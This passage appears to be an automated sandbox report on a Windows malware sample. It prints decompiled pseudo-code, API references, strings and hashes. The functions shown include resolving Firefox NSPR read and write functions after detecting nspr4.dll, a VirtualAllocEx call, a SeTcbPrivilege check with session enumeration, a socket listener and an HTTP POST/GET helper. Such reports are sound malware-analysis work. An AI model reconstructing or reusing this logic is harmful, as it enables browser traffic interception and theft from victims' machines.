											_t65 =  *_t85( *_t39, 0, 0);
											_t97 = _t65;
											__eflags = _t97 - 0xffffffff;
											if(_t97 == 0xffffffff) {
												break;
											}
											__imp__WSAEventSelect(_t97, 0, 0);
											_v156 = 0;
											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0);
											E004197A3(_t87, _t97);
											_t69 = E00417DDD(0x20000, E00413BE0, _t97);
											__eflags = _t69;
											if(_t69 == 0) {
												E0041974B(_t69, _t97);
											}
										}
										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
										__eflags = _t59;
										if(_t59 > 0) {
											continue;
										}
										goto L25;
									}
									_t72 = _v164;
									L20:
									_v168 = _t72;
									goto L23;
								}
								_t72 = _v156;
								goto L20;
							}
							goto L25;
						}
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t77 = WaitForSingleObject( *0x42305c, 0x3e8);
						__eflags = _t77 - 0x102;
						if(_t77 != 0x102) {
							break;
						}
						_t87 = _v74;
						_t94 = E00413B58( &_v156, _v74,  &_v164) & 0x0000ffff;
						__eflags = _t94;
						if(_t94 == 0) {
							continue;
						}
						break;
					}
					__eflags = _t94;
					if(_t94 == 0) {
						goto L26;
					}
					goto L7;
				}
				_t49 = 1;
				goto L27;
			}

0x00413cb3
0x00413cbe
0x00413cc5
0x00413ccc
0x00413cd2
0x00413cdc
0x00413ce1
0x00413ce3
0x00413e7b
0x00413e7f
0x00413e84
0x00413e84
0x00413e86
0x00413e8c
0x00413e8c
0x00413cee
0x00413cf3
0x00413d05
0x00413d08
0x00413d0b
0x00413d48
0x00413d48
0x00413d4d
0x00413d54
0x00413d5e
0x00413d63
0x00413d63
0x00413d6d
0x00413d71
0x00413d75
0x00413d7d
0x00413d7f
0x00413d81
0x00413d85
0x00413d85
0x00413d89
0x00413d8d
0x00413d8f
0x00413d91
0x00413d95
0x00413d95
0x00413d95
0x00413d99
0x00413d99
0x00413da9
0x00413daf
0x00413db1
0x00413e57
0x00413e5b
0x00413e70
0x00413e79
0x00000000
0x00413db7
0x00413db7
0x00413dbd
0x00413dbd
0x00413dc1
0x00000000
0x00000000
0x00413dc7
0x00413dcb
0x00413dcf
0x00413dd7
0x00413ddb
0x00413e2f
0x00413e2f
0x00413e31
0x00413e35
0x00413e37
0x00413e39
0x00413e3c
0x00000000
0x00000000
0x00413dea
0x00413e06
0x00413e0a
0x00413e11
0x00413e21
0x00413e26
0x00413e28
0x00413e2a
0x00413e2a
0x00413e28
0x00413e49
0x00413e4f
0x00413e51
0x00000000
0x00000000
0x00000000
0x00413e51
0x00413ddd
0x00413de1
0x00413de1
0x00000000
0x00413de1
0x00413dd1
0x00000000
0x00413dd1
0x00000000
0x00413dbd
0x00000000
0x00000000
0x00000000
0x00413d0d
0x00413d0d
0x00413d18
0x00413d1e
0x00413d23
0x00000000
0x00000000
0x00413d25
0x00413d37
0x00413d3a
0x00413d3d
0x00000000
0x00000000
0x00000000
0x00413d3d
0x00413d3f
0x00413d42
0x00000000
0x00000000
0x00000000
0x00413d42
0x00413cd6
0x00000000

APIs

Part of subcall function 0040EDBB: CreateMutexW.KERNEL32(00422BD0,00000000,?,?,?,?,?), ref: 0040EDDC

WaitForSingleObject.KERNEL32(000003E8,?,?,743C152E,00000002), ref: 00413D18
WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,743C152E), ref: 00413DA9
accept.WS2_32(?,00000000,00000000), ref: 00413E35
WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 00413E49
CloseHandle.KERNEL32(?), ref: 00413E6A
CloseHandle.KERNEL32(?), ref: 00413E79

Strings

;A, xrefs: 00413E31

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingleaccept
String ID: ;A
API String ID: 38240579-3646425762
Opcode ID: 9f3073dc993a35bcca8bf40d70837224a6f02cc8c0a085c08d24897742cf9eb3
Instruction ID: b510ce600d3a98f345b50b4e7db6aee6c888548736ec519748eafceba13fb2d4
Opcode Fuzzy Hash: 9f3073dc993a35bcca8bf40d70837224a6f02cc8c0a085c08d24897742cf9eb3
Instruction Fuzzy Hash: 6C515D71108340ABC720EF66D844CAFB7E8EB85715F50092EF595A32A0D734DE85CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E85A, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 87
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E85A(void* __ecx, void* __edx, void* __eflags) {
				long _v8;
				signed int _v12;
				void _v532;
				void* __edi;
				unsigned int _t22;
				void* _t30;
				void* _t39;
				void* _t41;
				WCHAR* _t42;
				void* _t43;
				void* _t46;

				_t41 = __edx;
				_t39 = __ecx;
				InitializeCriticalSection(0x4228a8);
				 *0x42289c = 0;
				 *0x4228a4 = 0;
				 *0x4228a0 = 0;
				 *0x422834 = 0;
				 *0x4230bc = 0;
				 *0x42313c = 0;
				 *0x423140 = 0;
				InitializeCriticalSection(0x423124);
				_t42 =  &_v532;
				E0040F0DC(_t39, _t42, 0);
				_v12 = _v12 | 0xffffffff;
				_v8 = 0x1fe;
				_t43 = CreateFileW(_t42, 0x80000000, 1, 0, 3, 0, 0);
				if(_t43 != 0xffffffff) {
					if(ReadFile(_t43,  &_v532, _v8,  &_v8, 0) != 0) {
						_v12 = _v8;
					}
					CloseHandle(_t43);
				}
				_t22 = _v12;
				if(_t22 == 0xffffffff || (_t22 & 0x00000001) != 0) {
					_t22 = 0;
				}
				 *((short*)(_t46 + (_t22 >> 1) * 2 - 0x210)) = 0;
				E00406DDD( &_v532);
				E00412A50( &_v532);
				 *0x422a6c = 0;
				 *0x422a88 = 0;
				InitializeCriticalSection("hp*B");
				E004080CB(_t41);
				if(GetModuleHandleW(L"nspr4.dll") == 0) {
					_t30 = 0;
				} else {
					_t30 = E004159B8(0, _t41, _t29);
				}
				if(_t30 != 0) {
					 *0x423144 =  *0x423144 | 0x00000001;
				}
				E00415781();
				return 1;
			}

0x0040e85a
0x0040e85a
0x0040e871
0x0040e87c
0x0040e882
0x0040e888
0x0040e88e
0x0040e894
0x0040e89a
0x0040e8a0
0x0040e8a6
0x0040e8a9
0x0040e8af
0x0040e8b4
0x0040e8c7
0x0040e8d4
0x0040e8d9
0x0040e8f3
0x0040e8f8
0x0040e8f8
0x0040e8fc
0x0040e8fc
0x0040e902
0x0040e908
0x0040e90e
0x0040e90e
0x0040e914
0x0040e922
0x0040e92d
0x0040e937
0x0040e93d
0x0040e943
0x0040e945
0x0040e957
0x0040e962
0x0040e959
0x0040e95b
0x0040e95b
0x0040e966
0x0040e968
0x0040e968
0x0040e96f
0x0040e97a

APIs

InitializeCriticalSection.KERNEL32(004228A8,00000000,74B04EE0,00000000), ref: 0040E871
InitializeCriticalSection.KERNEL32(00423124), ref: 0040E8A6

Part of subcall function 0040F0DC: PathRenameExtensionW.SHLWAPI(?,.dat,?,00422BF8,00000000,00000032,?,77E49EB0,00000000), ref: 0040F155

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 0040E8CE
ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 0040E8EB
CloseHandle.KERNEL32(00000000), ref: 0040E8FC
InitializeCriticalSection.KERNEL32(hp*B), ref: 0040E943
GetModuleHandleW.KERNEL32(nspr4.dll), ref: 0040E94F

Strings

nspr4.dll, xrefs: 0040E94A
hp*B, xrefs: 0040E932

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalInitializeSection$FileHandle$CloseCreateExtensionModulePathReadRename
String ID: hp*B$nspr4.dll
API String ID: 1155594396-612219018
Opcode ID: d2c5eadc403bc3566a4fa4ca0947c6ba4ca8daed34fff53abf9418bc5f06d4f6
Instruction ID: 421def61052ff6ad850046fd3176ab1d68e5e177642732c6ea1f52f3e17782f6
Opcode Fuzzy Hash: d2c5eadc403bc3566a4fa4ca0947c6ba4ca8daed34fff53abf9418bc5f06d4f6
Instruction Fuzzy Hash: 34318871640218EFC720AF699DC5AAA77B8AB44314F50097BE515F32E0D7784E568B18

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE3F, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040DE3F(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				char _v92;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				void* _t25;
				long _t27;
				void* _t28;
				long _t29;
				void* _t33;
				void* _t39;
				void* _t41;
				void* _t44;
				long _t49;
				void* _t50;
				void* _t57;
				void* _t62;
				void* _t69;
				void* _t73;
				WCHAR* _t77;
				void* _t78;
				void* _t80;
				void* _t82;

				_t73 = __edx;
				_t70 = __ecx;
				_t22 = E0040EDBB(__ecx, __eflags, 0x743c1521, 2);
				_v28 = _t22;
				if(_t22 != 0) {
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t25 = E0040EEE1();
					__eflags = _t25;
					if(_t25 == 0) {
						L24:
						E00419B7B(_v28);
						__eflags = 0;
						return 0;
					}
					_t27 = WaitForSingleObject( *0x42305c, 0xea60);
					__eflags = _t27 - 0x102;
					if(_t27 != 0x102) {
						goto L24;
					}
					do {
						_t28 = E00405A4B(_t70);
						_v24 = _t28;
						__eflags = _t28;
						if(__eflags == 0) {
							goto L22;
						}
						_t80 = E0041BF16( &_v16, _t73, __eflags, _t28, 2, 0x20000000);
						_v20 = _t80;
						__eflags = _t80;
						if(__eflags == 0) {
							L21:
							E004163A8(_v20);
							E004163A8(_v24);
							goto L22;
						}
						_t70 = _v16;
						_t33 = E0040D8D4(_v16, __eflags, _t80);
						__eflags = _t33;
						if(_t33 == 0) {
							goto L21;
						} else {
							goto L8;
						}
						do {
							L8:
							_v8 = E00417278(_t80, 1);
							_v12 = E00417278(_t80, 2);
							_t39 = E00417757(_t80, E00416EE5(_t80));
							_t72 = _v8;
							_t41 = E00417757(_t72, E00416EE5(_v8));
							_t70 = _v12;
							_push(E00417757(_t70, E00416EE5(_v12)));
							_push(_t41);
							_push(_t39);
							_push(L"Global\\%08X%08X%08X");
							_t73 = 0x20;
							_t77 =  &_v92;
							_t44 = E0041709B(_t43, _t73, _t77);
							_t82 = _t82 + 0x10;
							__eflags = _t44 - 0x1f;
							if(_t44 != 0x1f) {
								goto L20;
							}
							_t69 = CreateMutexW(0x422bd0, 1, _t77);
							__eflags = _t69;
							if(_t69 == 0) {
								goto L20;
							}
							_t49 = GetLastError();
							__eflags = _t49 - 0xb7;
							if(_t49 == 0xb7) {
								CloseHandle(_t69);
								_t69 = 0;
								__eflags = 0;
							}
							__eflags = _t69;
							if(_t69 != 0) {
								_t50 = 0x10;
								_t78 = E00416378(_t50);
								__eflags = _t78;
								if(_t78 == 0) {
									L19:
									E00419B7B(_t69);
									goto L20;
								}
								 *_t78 = E00416806(_t51 | 0xffffffff, _t80);
								 *(_t78 + 4) = E00416806(_t53 | 0xffffffff, _v8);
								_t57 = E00416806(_t55 | 0xffffffff, _v12);
								__eflags =  *_t78;
								 *(_t78 + 8) = _t57;
								 *(_t78 + 0xc) = _t69;
								if( *_t78 == 0) {
									L18:
									E004163A8( *_t78);
									E004163A8( *(_t78 + 4));
									E004163A8( *(_t78 + 8));
									E004163A8(_t78);
									goto L19;
								}
								__eflags =  *(_t78 + 4);
								if( *(_t78 + 4) == 0) {
									goto L18;
								}
								__eflags = _t57;
								if(_t57 == 0) {
									goto L18;
								}
								_t62 = E00417DDD(0x80000, E0040DB94, _t78);
								__eflags = _t62;
								if(_t62 != 0) {
									goto L20;
								}
								goto L18;
							}
							L20:
							_t80 = E00417278(_t80, 3);
							__eflags = _t80;
						} while (_t80 != 0);
						goto L21;
						L22:
						_t29 = WaitForSingleObject( *0x42305c, 0xea60);
						__eflags = _t29 - 0x102;
					} while (_t29 == 0x102);
					goto L24;
				}
				return _t22 + 1;
			}

0x0040de3f
0x0040de3f
0x0040de4c
0x0040de51
0x0040de56
0x0040de67
0x0040de6d
0x0040de72
0x0040de74
0x0040e032
0x0040e035
0x0040e03a
0x00000000
0x0040e03a
0x0040de85
0x0040de8b
0x0040de90
0x00000000
0x00000000
0x0040de99
0x0040de99
0x0040de9e
0x0040dea1
0x0040dea3
0x00000000
0x00000000
0x0040deb9
0x0040debb
0x0040debe
0x0040dec0
0x0040e003
0x0040e006
0x0040e00e
0x00000000
0x0040e00e
0x0040dec6
0x0040deca
0x0040decf
0x0040ded1
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ded7
0x0040ded7
0x0040dee0
0x0040deee
0x0040def8
0x0040defd
0x0040df09
0x0040df0e
0x0040df1f
0x0040df20
0x0040df21
0x0040df22
0x0040df29
0x0040df2a
0x0040df2d
0x0040df32
0x0040df35
0x0040df38
0x00000000
0x00000000
0x0040df4e
0x0040df50
0x0040df52
0x00000000
0x00000000
0x0040df58
0x0040df5e
0x0040df63
0x0040df66
0x0040df6c
0x0040df6c
0x0040df6c
0x0040df6e
0x0040df70
0x0040df74
0x0040df7a
0x0040df7c
0x0040df7e
0x0040dfea
0x0040dfeb
0x00000000
0x0040dfeb
0x0040df8c
0x0040df99
0x0040df9f
0x0040dfa4
0x0040dfa7
0x0040dfaa
0x0040dfad
0x0040dfcd
0x0040dfcf
0x0040dfd7
0x0040dfdf
0x0040dfe5
0x00000000
0x0040dfe5
0x0040dfaf
0x0040dfb3
0x00000000
0x00000000
0x0040dfb5
0x0040dfb7
0x00000000
0x00000000
0x0040dfc4
0x0040dfc9
0x0040dfcb
0x00000000
0x00000000
0x00000000
0x0040dfcb
0x0040dff0
0x0040dff9
0x0040dffb
0x0040dffb
0x00000000
0x0040e013
0x0040e01e
0x0040e024
0x0040e024
0x00000000
0x0040e031
0x00000000

APIs

Part of subcall function 0040EDBB: CreateMutexW.KERNEL32(00422BD0,00000000,?,?,?,?,?), ref: 0040EDDC

GetCurrentThread.KERNEL32 ref: 0040DE60
SetThreadPriority.KERNEL32(00000000), ref: 0040DE67
WaitForSingleObject.KERNEL32(0000EA60), ref: 0040DE85
CreateMutexW.KERNEL32(00422BD0,00000001,?,20000000), ref: 0040DF48
GetLastError.KERNEL32 ref: 0040DF58
CloseHandle.KERNEL32(00000000), ref: 0040DF66

Strings

Global\%08X%08X%08X, xrefs: 0040DF22

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateMutexThread$CloseCurrentErrorHandleLastObjectPrioritySingleWait
String ID: Global\%08X%08X%08X
API String ID: 3448221409-3239447729
Opcode ID: 44956bcca47d16276b05bbf08a513f2c613f6cb0b486cf0377f57f50e972279a
Instruction ID: 9c5dfea0fc15b11e624fa0cc340d72acb178562ce1c3e4768cee6e39fb074b9b
Opcode Fuzzy Hash: 44956bcca47d16276b05bbf08a513f2c613f6cb0b486cf0377f57f50e972279a
Instruction Fuzzy Hash: 1741B430A00606ABDB217BB2CD46BAF7665AF00718F10463BF511F62E2DB7CCD90966C

Uniqueness

Uniqueness Score: -1.00%

Function 00408EC9, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00408EC9(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _v8;
				char _v12;
				char _v16;
				_Unknown_base(*)()* _v20;
				intOrPtr _v24;
				char _v40;
				char _v60;
				char _v84;
				char _v112;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t30;
				_Unknown_base(*)()* _t42;
				intOrPtr _t44;
				intOrPtr _t50;
				intOrPtr* _t55;
				void* _t57;
				void* _t58;
				intOrPtr* _t59;
				CHAR* _t61;
				CHAR* _t62;
				CHAR* _t63;
				_Unknown_base(*)()* _t64;
				WCHAR* _t66;
				void* _t68;
				void* _t75;

				_t58 = __ecx;
				_t66 =  &_v112;
				E0040FA33(0xdd, _t66);
				_t30 = LoadLibraryW(_t66);
				_v8 = _t30;
				if(_t30 != 0) {
					_t61 =  &_v84;
					E0040F9FD(0xde, _t61);
					_t55 = GetProcAddress(_v8, _t61);
					_t62 =  &_v40;
					E0040F9FD(0xdf, _t62);
					_v20 = GetProcAddress(_v8, _t62);
					_t63 =  &_v60;
					E0040F9FD(0xe0, _t63);
					_t42 = GetProcAddress(_v8, _t63);
					_t68 = 0;
					_t64 = _t42;
					if(_t55 == 0 || _v20 == 0 || _t64 == 0) {
						L16:
						return FreeLibrary(_v8);
					} else {
						_t44 = E00417A74(L"SeTcbPrivilege");
						__imp__WTSGetActiveConsoleSessionId();
						_v24 = _t44;
						asm("in al, dx");
						if(_t44 != 0xffffffff) {
							E00408E58(_t58, 0, _t64, _t44, _a4, _a8);
						}
						_t75 =  *_t55(_t68, _t68, 1,  &_v16,  &_v12);
						if(_t75 == 0) {
							goto L16;
						} else {
							_t57 = 0;
							if(_v12 <= _t68) {
								L15:
								_v20(_v16);
								goto L16;
							} else {
								goto L10;
							}
							do {
								L10:
								_t59 = _t68 + _v16;
								_t50 =  *((intOrPtr*)(_t59 + 8));
								if(_t50 == 0 || _t50 == 4) {
									_t51 =  *_t59;
									if( *_t59 != _v24) {
										E00408E58(_t59, _t68, _t64, _t51, _a4, _a8);
									}
								}
								_t57 = _t57 + 1;
								_t68 = _t68 + 0xc;
							} while (_t57 < _v12);
							goto L15;
						}
					}
				}
				return _t30;
			}

0x00408ec9
0x00408ed0
0x00408ed8
0x00408ee0
0x00408ee6
0x00408eeb
0x00408ef3
0x00408efb
0x00408f0e
0x00408f10
0x00408f18
0x00408f25
0x00408f28
0x00408f30
0x00408f3b
0x00408f3d
0x00408f3f
0x00408f43
0x00408fc1
0x00000000
0x00408f4e
0x00408f53
0x00408f58
0x00408f5e
0x00408f60
0x00408f64
0x00408f6e
0x00408f6e
0x00408f81
0x00408f83
0x00000000
0x00408f85
0x00408f85
0x00408f8a
0x00408fbb
0x00408fbe
0x00000000
0x00000000
0x00000000
0x00000000
0x00408f8c
0x00408f8c
0x00408f8f
0x00408f92
0x00408f97
0x00408f9e
0x00408fa3
0x00408fad
0x00408fad
0x00408fa3
0x00408fb2
0x00408fb3
0x00408fb6
0x00000000
0x00408f8c
0x00408f83
0x00408f43
0x00408fce

APIs

LoadLibraryW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040985F,?,?), ref: 00408EE0
GetProcAddress.KERNEL32(?,?), ref: 00408F0C
GetProcAddress.KERNEL32(?,?), ref: 00408F23
GetProcAddress.KERNEL32(?,?), ref: 00408F3B
FreeLibrary.KERNEL32(?), ref: 00408FC4

Part of subcall function 00417A74: GetCurrentThread.KERNEL32 ref: 00417A84
Part of subcall function 00417A74: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00408F58,SeTcbPrivilege), ref: 00417A8B
Part of subcall function 00417A74: OpenProcessToken.ADVAPI32(000000FF,00000020,00408F58,?,?,?,?,00408F58,SeTcbPrivilege), ref: 00417A9D

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,0040985F,?,?,00000000), ref: 00408F58

Part of subcall function 00408E58: EqualSid.ADVAPI32(00000000,0000000C,?,00408FD1,?,00408FB2,00408FD1,?,?,?), ref: 00408E7D
Part of subcall function 00408E58: CloseHandle.KERNEL32(?,?,00408FD1,?,00408FB2,00408FD1,?,?,?), ref: 00408EBE

Strings

SeTcbPrivilege, xrefs: 00408F4E
.exe, xrefs: 00408EF2

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
String ID: .exe$SeTcbPrivilege
API String ID: 1107370034-552748125
Opcode ID: 0bba9a06da91cb5b4d580f3f9d5f51d2ed0af1bbceddb0ae03c64cfbc8726b4a
Instruction ID: 2013914dc8b6833cb27c338b05c7edef00abd6b09f08614082261d6dd8d1b5c2
Opcode Fuzzy Hash: 0bba9a06da91cb5b4d580f3f9d5f51d2ed0af1bbceddb0ae03c64cfbc8726b4a
Instruction Fuzzy Hash: 49318F31A00119BBCF11ABA4CE419AFBB79EF44304F10013BF841F6290CB759E45DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418090, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 67
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00418090(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
				long _t18;
				char* _t21;
				signed int _t29;
				char* _t30;
				void* _t32;

				_t29 = _a20 & 0x00000002;
				_t18 = 0x8404f700;
				if(_t29 != 0) {
					_t18 = 0x8444f700;
				}
				if((_a20 & 0x00000004) != 0) {
					_t18 = _t18 | 0x00800000;
				}
				_t30 = "POST";
				if((_a20 & 0x00000001) == 0) {
					_t30 = "GET";
				}
				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0, 0x422000, _t18, 0);
				if(_t32 == 0) {
					L15:
					return 0;
				} else {
					if(_t29 == 0) {
						_push(0x13);
						_t21 = "Connection: close\r\n";
						_pop(0);
					} else {
						_t21 = 0;
					}
					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
						L14:
						InternetCloseHandle(_t32);
						goto L15;
					} else {
						_a20 = _a20 & 0x00000000;
						_a8 = 4;
						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
							goto L14;
						} else {
							return _t32;
						}
					}
				}
			}

0x00418097
0x0041809b
0x004180a0
0x004180a2
0x004180a2
0x004180ab
0x004180ad
0x004180ad
0x004180b6
0x004180bb
0x004180bd
0x004180bd
0x004180de
0x004180e2
0x00418142
0x00000000
0x004180e4
0x004180e6
0x004180ee
0x004180f0
0x004180f5
0x004180e8
0x004180e8
0x004180ea
0x00418107
0x0041813b
0x0041813c
0x00000000
0x00418109
0x00418109
0x0041811d
0x0041812c
0x00000000
0x00418137
0x00000000
0x00418137
0x0041812c
0x00418107

APIs

HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,00422000,8404F700,00000000), ref: 004180D8
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 004180FF
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 00418124
InternetCloseHandle.WININET(00000000), ref: 0041813C

Strings

POST, xrefs: 004180B6
GET, xrefs: 004180BD, 004180D4
HTTP/1.1, xrefs: 004180CC
Connection: close, xrefs: 004180F0, 004180FD

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
String ID: Connection: close$GET$HTTP/1.1$POST
API String ID: 3080274660-1621676011
Opcode ID: 80201272b0941e57adff15bd2aeb3f098f64aa5e38a2602c4429c5faa5035b24
Instruction ID: 4e1af37f282a18607ebb11c29f3d7c9f4765a7b66f40b9bd97d97e8845d5a83b
Opcode Fuzzy Hash: 80201272b0941e57adff15bd2aeb3f098f64aa5e38a2602c4429c5faa5035b24
Instruction Fuzzy Hash: AC1181722112097BEB214E508D45FE73A9CEB44758F10802AFE01A62A0DBB9DD9587AC

Uniqueness

Uniqueness Score: -1.00%

Function 004159B8, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 36
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004159B8(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
				void* __ebx;
				_Unknown_base(*)()* _t4;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t12;

				_t12 = __edx;
				_t11 = __ecx;
				 *0x422360 = GetProcAddress(__edi, "PR_OpenTCPSocket");
				 *0x422370 = GetProcAddress(__edi, "PR_Close");
				 *0x422380 = GetProcAddress(__edi, "PR_Read");
				_t4 = GetProcAddress(__edi, "PR_Write");
				_push(0x422360);
				_t9 = 4;
				 *0x422390 = _t4;
				_t10 = E004156F0(_t9, _t11, _t12);
				if(_t10 != 0) {
					E00412B09(__edi,  *0x422368,  *0x422378,  *0x422388,  *0x422398);
				}
				return _t10;
			}

0x004159b8
0x004159b8
0x004159ce
0x004159db
0x004159e8
0x004159ed
0x004159ef
0x004159f6
0x004159f7
0x00415a01
0x00415a05
0x00415a21
0x00415a21
0x00415a2a

APIs

GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 004159C6
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 004159D3
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 004159E0
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 004159ED

Part of subcall function 004156F0: VirtualAllocEx.KERNEL32(000000FF,00000000,00000034,00003000,00000040,00000000,77E49EB0,?,?,004159B6,00422020,00000000,0040E974), ref: 00415727

Part of subcall function 00412B09: InitializeCriticalSection.KERNEL32(0042307C,74B04EE0,00415A26,00422360), ref: 00412B1F
Part of subcall function 00412B09: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 00412B5B
Part of subcall function 00412B09: GetProcAddress.KERNEL32(PR_SetError), ref: 00412B6D
Part of subcall function 00412B09: GetProcAddress.KERNEL32(PR_GetError), ref: 00412B7F

Strings

PR_Read, xrefs: 004159D5
PR_Close, xrefs: 004159C8
PR_Write, xrefs: 004159E2
PR_OpenTCPSocket, xrefs: 004159C0

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocCriticalInitializeSectionVirtual
String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
API String ID: 1833644279-3954199073
Opcode ID: 1e1bd52c6f2de0c89ca3d518b3305bc1ac1c1f2db7dfc98eee6008c2fa8e61f5
Instruction ID: 014fd1e5d22c4949a45350cc3e3947508174571bf4fd34e88478ada2e3ec2d63
Opcode Fuzzy Hash: 1e1bd52c6f2de0c89ca3d518b3305bc1ac1c1f2db7dfc98eee6008c2fa8e61f5
Instruction Fuzzy Hash: 63F03071B80314BACA219F75BD46E967FA8BB86B503D0013BB904A71B0C7FD0452DA5C

Uniqueness

Uniqueness Score: -1.00%

Function 00414E0E, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 367
timenetworkCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00414E0E(char __eax, void* __ecx, char* _a4, intOrPtr* _a8, signed int* _a12) {
				char _v540;
				char _v800;
				char _v804;
				char _v860;
				struct _SYSTEMTIME _v876;
				char _v900;
				signed int _v968;
				signed int _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				char* _v992;
				char _v996;
				void* _v1008;
				struct _SYSTEMTIME _v1028;
				signed int _v1032;
				short _v1036;
				signed short* _v1040;
				signed int _v1044;
				intOrPtr* _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				char _v1068;
				intOrPtr _v1072;
				char _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t158;
				signed int _t159;
				intOrPtr _t160;
				signed int _t168;
				void* _t188;
				void* _t199;
				signed int _t211;
				signed int _t215;
				signed int _t218;
				signed char _t222;
				signed int _t224;
				void* _t227;
				void* _t228;
				signed int _t229;
				signed int _t230;
				signed int _t240;
				void* _t242;
				signed int _t250;
				intOrPtr* _t254;
				signed int _t255;
				void* _t257;
				intOrPtr _t258;
				short* _t261;
				void* _t280;
				intOrPtr* _t286;
				signed int _t291;
				long _t294;
				signed short* _t296;
				signed short* _t298;
				signed int _t301;
				intOrPtr* _t303;
				signed int _t307;
				void* _t309;

				_t257 = __ecx;
				_t309 = (_t307 & 0xfffffff8) - 0x424;
				_v1032 = _v1032 & 0x00000000;
				if(__eax == 0) {
					L52:
					asm("sbb eax, eax");
					return  ~0x00000000;
